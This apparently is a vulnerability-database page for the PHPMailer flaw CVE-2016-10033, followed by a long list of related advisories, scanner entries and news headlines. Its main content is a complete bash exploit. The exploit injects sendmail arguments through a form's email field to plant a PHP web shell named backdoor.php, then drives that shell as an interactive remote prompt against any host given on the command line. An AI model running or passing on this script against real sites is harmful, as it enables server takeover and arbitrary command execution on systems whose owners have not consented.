#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033
 
echo '[+] CVE-2016-10033 exploit by opsxcq'
 
if [ -z "$1" ]
then
    echo '[-] Please inform an host as parameter'
    exit -1
fi
 
host=$1
 
echo '[+] Exploiting '$host
 
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\[email protected] -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
 
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
    echo '[+] Running '$cmd
    curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
    echo
    read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'

#  0day.today [2018-01-08]  #

veracode 2

nessus 21

saint 6

metasploit 2

freebsd 2

debiancve 2

thn 3

patchstack 1

exploitpack 8

osv 8

alpinelinux 2

myhack58 6

prion 3

packetstorm 10

nuclei 1

hackerone 1

seebug 6

zdt 8

f5 2

joomla 4

cve 3

openvas 12

exploitdb 10

ubuntucve 2

threatpost 3

debian 4

checkpoint_advisories 1

fedora 2

rapid7blog 1

attackerkb 1

github 2

mageia 1

altlinux 1

ubuntu 2

rapid7community 1

archlinux 1

veracode

Remote Code Execution (RCE)

2017-11-29 04:14:19

Remote Code Execution (RCE)

2017-07-26 01:24:02

nessus

FreeBSD : phpmailer -- Remote Code Execution (c7656d4c-cb60-11e6-a9a5-b499baebfeaf)

2016-12-27 00:00:00

F5 Networks BIG-IP : PHPMailer vulnerability (K74977440)

2017-05-16 00:00:00

Fedora 25 : php-PHPMailer (2016-6941d25875)

2017-01-06 00:00:00

saint

PHPMailer Command Injection in WordPress Core via Exim

2017-05-17 00:00:00

PHPMailer PwnScriptum Remote Code Execution

2017-01-05 00:00:00

PHPMailer Command Injection in WordPress Core via Exim

2017-05-17 00:00:00

metasploit

WordPress PHPMailer Host Header Command Injection

2017-05-10 20:17:20

PHPMailer Sendmail Argument Injection

2016-12-29 22:17:06

freebsd

phpmailer -- Remote Code Execution

2016-12-26 00:00:00

phpmailer -- Remote Code Execution

2016-12-28 00:00:00

debiancve

CVE-2016-10033

2016-12-30 19:59:00

CVE-2016-10045

2016-12-30 19:59:00

thn

Critical PHPMailer Flaw leaves Millions of Websites Vulnerable to Remote Exploit

2016-12-26 00:26:00

0-Day Flaws in Vanilla Forums Let Remote Attackers Hack Websites

2017-05-11 21:33:00

Critical Updates — RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail

2017-01-02 23:45:00

patchstack

WordPress Huge-IT Video Gallery plugin <=2.0.4 - SQL Injection vulnerability

2017-05-24 00:00:00

exploitpack

PHPMailer 5.2.18 - Remote Code Execution (PHP)

2016-12-25 00:00:00

PHPMailer 5.2.18 - Remote Code Execution (Bash)

2016-12-26 00:00:00

WordPress 4.6 - Remote Code Execution

2017-05-03 00:00:00

osv

libphp-phpmailer - security update

2016-12-31 00:00:00

libphp-phpmailer - security update

2016-12-31 00:00:00

Remote code execution in PHPMailer

2020-03-05 22:09:17

alpinelinux

CVE-2016-10033

2016-12-30 19:59:00

CVE-2016-10045

2016-12-30 19:59:00

myhack58

The widespread use of email components: PHPMailer remote code execution vulnerability exists-vulnerability warning-the black bar safety net

2016-12-28 00:00:00

CVE-2016-10033: the PHPMailer remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

2017-01-10 00:00:00

WordPress 4.6 remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

2017-05-10 00:00:00

prion

Command injection

2016-12-30 19:59:00

Design/Logic Flaw

2016-12-31 02:59:00

Command injection

2016-12-30 19:59:00

packetstorm

PHPMailer Remote Code Execution

2016-12-29 00:00:00

PHPMailer 5.2.17 Remote Code Execution

2016-12-26 00:00:00

WordPress PHPMailer Host Header Command Injection

2017-05-17 00:00:00

nuclei

WordPress PHPMailer < 5.2.18 - Remote Code Execution

2021-03-24 11:33:21

hackerone

Imgur: RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`

2017-03-12 03:46:46

seebug

PHPMailer < 5.2.18 Remote Code Execution（CVE-2016-10033） (PwnScriptum)

2016-12-26 00:00:00

BigTree CMS - Bypass CSRF filter and execute code with PHPMailer

2017-04-25 00:00:00

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

2016-12-30 00:00:00

zdt

WordPress PHPMailer Host Header Command Injection Exploit

2017-05-17 00:00:00

PHPMailer < 5.2.18 Remote Code Execution Vulnerability

2016-12-26 00:00:00

PHPMailer 5.2.18 - Remote Code Execution (Python) Exploit

2016-12-29 00:00:00

K74977440 : PHPMailer vulnerability CVE-2016-10033

2017-01-24 00:00:00

K73926196 : PHPMailer vulnerability CVE-2016-10045

2017-02-13 00:00:00

joomla

Chronoforms 5.0.12 PHP mailer vulnerability

2016-12-27 00:00:00

AcyMailing 5.6.0 PHP Mailer vulnerability

2016-12-28 00:00:00

[20161205] - PHPMailer Security Advisory

2016-12-30 19:59:00

cve

CVE-2016-10033

2016-12-30 19:59:00

CVE-2016-10045

2016-12-30 19:59:00

CVE-2016-1003

2016-12-31 02:59:00

openvas

PHPMailer < 5.2.18 Remote Code Execution Vulnerability.

2016-12-27 00:00:00

Debian: Security Advisory (DSA-3750)

2023-03-08 00:00:00

Debian: Security Advisory (DSA-3750-1)

2017-01-05 00:00:00

exploitdb

PHPMailer < 5.2.18 - Remote Code Execution

2016-12-25 00:00:00

WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)

2017-05-17 00:00:00

PHPMailer < 5.2.18 - Remote Code Execution

2016-12-26 00:00:00

ubuntucve

CVE-2016-10033

2016-12-30 00:00:00

CVE-2016-10045

2016-12-30 00:00:00

threatpost

Vanilla Forums Open Source Software Vulnerable to RCE, Host Header Injection Vulnerability

2017-05-11 16:39:13

PHPMailer Bug Leaves Millions of Websites Open to Attack

2016-12-27 13:22:54

PHPMailer, SwiftMailer Updates Resolve Critical Remote Code Execution Vulnerabilities

2016-12-29 14:20:38

debian

[SECURITY] [DLA 770-1] libphp-phpmailer security update

2016-12-31 14:24:48

[SECURITY] [DSA 3750-1] libphp-phpmailer security update

2016-12-31 10:48:11

[SECURITY] [DLA 770-2] libphp-phpmailer regression update

2017-01-03 16:00:13

checkpoint_advisories

PHPMailer Mail From Remote Code Execution (CVE-2016-10033; CVE-2016-10045)

2016-12-27 00:00:00

fedora

[SECURITY] Fedora 25 Update: php-PHPMailer-5.2.21-1.fc25

2017-01-06 04:52:02

[SECURITY] Fedora 24 Update: php-PHPMailer-5.2.22-1.fc24

2017-01-17 20:21:44

rapid7blog

Metasploit Weekly Wrap-Up

2022-07-01 18:44:47

attackerkb

CVE-2016-10033

2016-12-30 00:00:00

github

Remote code execution in PHPMailer

2020-03-05 22:09:17

Remote code execution in PHPMailer

2020-03-05 22:09:14

mageia

Updated php-phpmailer packages fix security vulnerabilities

2017-01-27 12:19:09

altlinux

Security fix for the ALT Linux 9 package phpipam version 1.26.050-alt1

2016-12-26 00:00:00

ubuntu

PHPMailer vulnerability

2023-03-15 00:00:00

PHPMailer vulnerabilities

2023-03-15 00:00:00

rapid7community

Metasploit Wrapup

2017-05-26 19:06:43

archlinux

[ASA-201701-22] wordpress: multiple issues

2017-01-15 00:00:00

Solutions

Vulnerabilities intelligence
Perimeter control tool
Linux scanner
Windows scanner
Developers SDK
Security Intelligence feeds

Database

Vulnerabilities
Exploits
Security News
BugBounty
Wild Exploited
Top Vulnerabilities
CVE Feed

Resources

Statics & Sources
Plugins
API docs
FAQ
Blog
Glossary

Company

About
Contacts
Pricing
EULA
Privacy Policy
OpenSource

@2024 Vulners Inc

0.975 High

EPSS

Percentile

100.0%

JSON

Related for 1337DAY-ID-26585